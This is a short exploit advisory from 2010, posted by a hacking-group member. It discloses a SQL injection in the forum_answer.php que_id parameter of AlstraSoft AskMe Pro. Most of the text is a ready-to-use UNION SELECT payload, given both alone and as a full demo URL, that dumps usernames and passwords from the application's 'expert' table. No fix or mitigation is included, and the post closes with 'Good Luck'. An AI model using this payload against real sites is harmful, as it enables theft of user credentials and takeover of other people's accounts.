==================================================================
# Exploit Title: AlstraSoft AskMe Pro SQL Injection Vulnerability
# Date: 12/09/2010
# Author: Amine_92
# Email: amine92_16@hotmail.fr 
# Software Link: http://www.alstrasoft.com/askme.htm
# Version: All Version
# Price: 99.99$
# Tested on: Xp Sp 2
# Home: Dark Zone Organization (www.v9b.org/vb)
==================================================================
SQL injection in AlstraSoft AskMe Pro
 
Affected items:
http://www.Victime.com/forum_answer.php?que_id=[SQL]
 
Example:
-9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert--
 
Demo URL:
http://www.Victime.com/forum_answer.php?que_id=-9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert--
 
==================================================================
Good Luck
 
Tank's To : All Memeber Of Dark Zone & Administrator Emptyzero
 
Don't Forget Our Brother In Gaza & Palestine